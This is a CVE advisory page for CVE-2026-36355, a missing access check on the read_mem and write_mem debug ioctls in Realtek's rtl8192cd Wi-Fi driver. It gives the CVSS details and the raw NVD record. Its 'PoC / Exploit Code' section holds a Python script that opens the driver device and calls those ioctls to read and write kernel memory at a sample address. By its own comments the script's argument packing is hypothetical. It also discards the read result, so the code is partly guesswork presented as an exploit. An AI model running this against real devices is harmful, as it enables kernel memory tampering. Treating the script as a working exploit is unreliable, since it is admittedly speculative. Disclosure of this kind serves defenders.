Security Vulnerability Report
CVE-2026-36355 CVSS 7.7 HIGH

CVE-2026-36355

Published: 2026-05-05 14:16:09
Last Modified: 2026-05-07 15:53:50

Description

The rtl8192cd Wi-Fi kernel driver in the Realtek rtl819x Jungle SDK (all known versions through v3.4.14B) does not perform any access control checks on the write_mem (ioctl 0x89F5) and read_mem (ioctl 0x89F6) debug handlers, which are compiled into production builds via the unconditionally defined _IOCTL_DEBUG_CMD_ macro in 8192cd_cfg.h.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Realtek rtl819x Jungle SDK <= v3.4.14B

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import fcntl
import struct
import os

# Constants based on vulnerability description
IOCTL_READ_MEM = 0x89F6
IOCTL_WRITE_MEM = 0x89F5
DEVICE_PATH = "/dev/rtl8192cd"  # Path may vary depending on device


def exploit_read(addr):
    """
    PoC to read kernel memory using vulnerable IOCTL.
    """
    try:
        # Open the device driver
        fd = os.open(DEVICE_PATH, os.O_RDWR)

        # Prepare data buffer (structure depends on specific driver implementation)
        # Assuming the driver takes an address and returns data
        # This is a generic PoC structure
        buf = bytearray(0x100)  # Read 256 bytes

        # Send IOCTL command 0x89F6 (read_mem)
        # Note: Argument packing is hypothetical as exact struct wasn't provided
        fcntl.ioctl(fd, IOCTL_READ_MEM, struct.pack('I', addr))
        print(f"[*] Attempting to read memory at: 0x{addr:x}")

        # In a real exploit, data would be parsed from the returned buffer
        os.close(fd)
    except Exception as e:
        print(f"[!] Exploit failed: {e}")


def exploit_write(addr, data):
    """
    PoC to write to kernel memory using vulnerable IOCTL.
    """
    try:
        fd = os.open(DEVICE_PATH, os.O_RDWR)
        print(f"[*] Attempting to write to memory at: 0x{addr:x}")

        # Send IOCTL command 0x89F5 (write_mem)
        fcntl.ioctl(fd, IOCTL_WRITE_MEM, data)
        os.close(fd)
    except Exception as e:
        print(f"[!] Exploit failed: {e}")


if __name__ == "__main__":
    print("[+] CVE-2026-36355 PoC: Realtek rtl819x Driver Missing Access Control")
    # Example target address (kernel text or data section)
    target_addr = 0xc0000000
    exploit_read(target_addr)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36355", "sourceIdentifier": "[email protected]", "published": "2026-05-05T14:16:08.737", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The rtl8192cd Wi-Fi kernel driver in the Realtek rtl819x Jungle SDK (all known versions through v3.4.14B) does not perform any access control checks on the write_mem (ioctl 0x89F5) and read_mem (ioctl 0x89F6) debug handlers, which are compiled into production builds via the unconditionally defined _IOCTL_DEBUG_CMD_ macro in 8192cd_cfg.h"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-782"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://realtek.com", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36355", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36355", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}